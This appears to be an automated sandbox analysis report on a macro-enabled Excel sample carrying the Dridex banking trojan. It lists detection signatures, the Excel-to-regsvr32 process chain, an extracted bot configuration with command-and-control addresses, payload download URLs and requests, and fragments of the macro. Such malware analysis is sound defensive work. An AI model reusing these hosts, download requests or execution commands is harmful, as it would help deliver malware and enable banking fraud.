Analysis Report sample20210113-01.xlsm

Overview

General Information

Sample Name: sample20210113-01.xlsm
Analysis ID: 339173
MD5: b777540ad31de24618cb9818debb2fd4
SHA1: 6e18fab506aefe0e1d1bdbb7bf61963075a4db61
SHA256: 39c47b42df4d66fe9b9e4cb03f486a6a8a11770010dd6537c55d2899b2e2021a
Tags: Dridex, xlsm

Detection

Hidden Macro 4.0 Dridex
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Dridex e-Banking trojan
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: BlueMashroom DLL Load
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Anomaly
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query network adapater information
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the installation date of Windows
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2448 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2540 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll. MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1100 cmdline: -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll. MD5: 432BE6CF7311062633459EEF6B242FB5)
    • regsvr32.exe (PID: 1296 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ndrztpo.dll. MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2808 cmdline: -s C:\Users\user\AppData\Local\Temp\ndrztpo.dll. MD5: 432BE6CF7311062633459EEF6B242FB5)
    • regsvr32.exe (PID: 2832 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jvkhmoba.dll. MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 10444", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 3", "221.126.244.72:443", "195.231.69.151:3889", "157.7.166.26:5353"]}

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: BlueMashroom DLL Load
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2448, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll., ProcessId: 2540
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2448, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll., ProcessId: 2540
Sigma detected: Regsvr32 Anomaly
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2448, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll., ProcessId: 2540

Signature Overview

AV Detection:

Found malware configuration
Source: 4.2.regsvr32.exe.bf0000.0.raw.unpack; Malware Configuration Extractor: Dridex {"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 10444", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 3", "221.126.244.72:443", "195.231.69.151:3889", "157.7.166.26:5353"]}
Multi AV Scanner detection for domain / URL
Source: http://bipolarmalta.mccarthy.ws/lpxtpiw.zip; Virustotal: Detection: 6%
Multi AV Scanner detection for submitted file
Source: sample20210113-01.xlsm; Virustotal: Detection: 25%
Source: sample20210113-01.xlsm; ReversingLabs: Detection: 10%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ndrztpo.dll; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\pgjasrqd.dll; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dyu828kp[1].rar; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lpxtpiw[1].zip; Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown; HTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 4_2_00CDCEF8 FindFirstFileExW,
Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 6_2_004ECEF8 FindFirstFileExW,

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\pgjasrqd.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\ndrztpo.dll
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: lpxtpiw[1].zip.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\regsvr32.exe
Source: global traffic; DNS query: name: bipolarmalta.mccarthy.ws
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 221.126.244.72:443
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 35.214.225.210:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49167
Source: global traffic; TCP traffic: 192.168.2.22:49171 -> 195.231.69.151:3889
Source: global traffic; HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx; Date: Wed, 13 Jan 2021 15:38:57 GMT; Content-Type: application/zip; Content-Length: 303616; Connection: keep-alive; Last-Modified: Fri, 18 Dec 2020 21:13:44 GMT; ETag: "4a200-5b6c39557f200"; alt-svc: quic=":443"; ma=86400; v="43,39"; Host-Header: 624d5be7be38418a3e2a818cc8b7029b; X-Proxy-Cache: HIT; Accept-Ranges: bytes
Source: Joe Sandbox ViewJA3 fingerprint: eb88d0b3e1961a0562f006e5ce2a0b87
Source: global trafficHTTP traffic detected: GET /lpxtpiw.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bipolarmalta.mccarthy.wsConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /dyu828kp.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: oudtshoornpharmacies.co.zaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /usc3d1.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sendgrid.invoteqleads.comConnection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 221.126.244.72
Source: unknownTCP traffic detected without corresponding DNS query: 195.231.69.151
Source: unknownTCP traffic detected without corresponding DNS query: 157.7.166.26
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CE39F9 InternetReadFile,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\272CF97F.emf
Source: regsvr32.exe, 00000004.00000002.2385230129.000000000061A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385418324.0000000000598000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000004.00000002.2385230129.000000000061A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385418324.0000000000598000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000004.00000002.2385230129.000000000061A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknownDNS traffic detected: queries for: bipolarmalta.mccarthy.ws
Source: regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000004.00000002.2385290882.0000000000671000.00000004.00000020.sdmpString found in binary or memory: http://crl.microsoft.v&
Source: regsvr32.exe, 00000004.00000002.2385230129.000000000061A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: regsvr32.exe, 00000004.00000002.2385290882.0000000000671000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: regsvr32.exe, 00000004.00000002.2385230129.000000000061A000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000004.00000003.2116675387.0000000003292000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?dbc0fc39602ef
Source: regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabE~w5
Source: regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000004.00000002.2385230129.000000000061A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000004.00000002.2385230129.000000000061A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385418324.0000000000598000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000003.00000002.2385462250.0000000001E20000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2385318587.0000000000690000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2385314469.0000000001CF0000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2385487805.00000000009B0000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.2117872818.0000000001CF0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000004.00000002.2386925336.0000000002380000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2386727384.0000000002380000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: https://157.7.166.26/
Source: regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: https://157.7.166.26:5353/
Source: regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: https://195.231.69.151/
Source: regsvr32.exe, 00000004.00000002.2385290882.0000000000671000.00000004.00000020.sdmpString found in binary or memory: https://195.231.69.151/c7
Source: regsvr32.exe, 00000004.00000002.2385290882.0000000000671000.00000004.00000020.sdmpString found in binary or memory: https://195.231.69.151/d7
Source: regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: https://195.231.69.151:3889/
Source: regsvr32.exe, 00000004.00000002.2385230129.000000000061A000.00000004.00000020.sdmpString found in binary or memory: https://195.231.69.151:3889/G
Source: regsvr32.exe, 00000004.00000002.2385230129.000000000061A000.00000004.00000020.sdmpString found in binary or memory: https://195.231.69.151:3889/hy
Source: regsvr32.exe, 00000004.00000002.2385290882.0000000000671000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385411279.0000000000591000.00000004.00000020.sdmpString found in binary or memory: https://221.126.244.72/
Source: regsvr32.exe, 00000004.00000002.2385192060.00000000005CF000.00000004.00000020.sdmpString found in binary or memory: https://221.126.244.72/3
Source: regsvr32.exe, 00000004.00000002.2385192060.00000000005CF000.00000004.00000020.sdmpString found in binary or memory: https://221.126.244.72/O
Source: regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49175 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49176 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49181 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49182 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49187 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49188 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49193 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49194 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49199 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49200 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49205 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49206 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49211 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49212 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49217 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49218 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49223 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49225 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49229 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49230 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49235 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49236 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49241 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49242 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49247 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49248 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49253 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49254 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49259 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49260 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49265 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49266 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49271 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49272 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49277 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49278 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49283 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49284 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49289 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49290 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49295 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49296 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49301 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49302 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49307 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49308 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49313 version: TLS 1.2

E-Banking Fraud:

Detected Dridex e-Banking trojan
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CB5150 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,LoadLibraryW,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004C5150 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,LoadLibraryW,

System Summary:

Document contains an embedded VBA macro which may execute processes
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function mi_1, API Run("listP_ab")
Document contains an embedded VBA macro with suspicious strings
Source: sample20210113-01.xlsmOLE, VBA macro line: Wscript.echo Run("" & oo2 & "ab")
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function mi_1, String wscript: Wscript.echo Run("" & oo2 & "ab")
Found Excel 4.0 Macro with suspicious formulas
Source: sample20210113-01.xlsmInitial sample: CALL
Source: sample20210113-01.xlsmInitial sample: CALL
Source: sample20210113-01.xlsmInitial sample: CALL
Source: sample20210113-01.xlsmInitial sample: CALL
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lpxtpiw[1].zip
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\ndrztpo.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\pgjasrqd.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dyu828kp[1].rar
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CC22A0 NtDelayExecution,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CDBE30 NtClose,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004D22A0 NtDelayExecution,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004EBE30 NtClose,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0021B780 VirtualAlloc,VirtualAlloc,NtSetInformationProcess,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_0021BA14 NtSetInformationProcess,
Source: sample20210113-01.xlsm | OLE, VBA macro line: Private Sub view_1_a_Layout(ByVal Index As Long)
Source: VBA code instrumentation | OLE, VBA macro: Module Sheet1, Function view_1_a_Layout
Source: sample20210113-01.xlsm | OLE indicator, VBA macros: true
Source: classification engine | Classification label: mal100.bank.expl.evad.winXLSM@11/18@3/6
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$sample20210113-01.xlsm
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRDC89.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: sample20210113-01.xlsm | Virustotal: Detection: 25%
Source: sample20210113-01.xlsm | ReversingLabs: Detection: 10%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll.
Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll.
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ndrztpo.dll.
Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ndrztpo.dll.
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jvkhmoba.dll.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll.
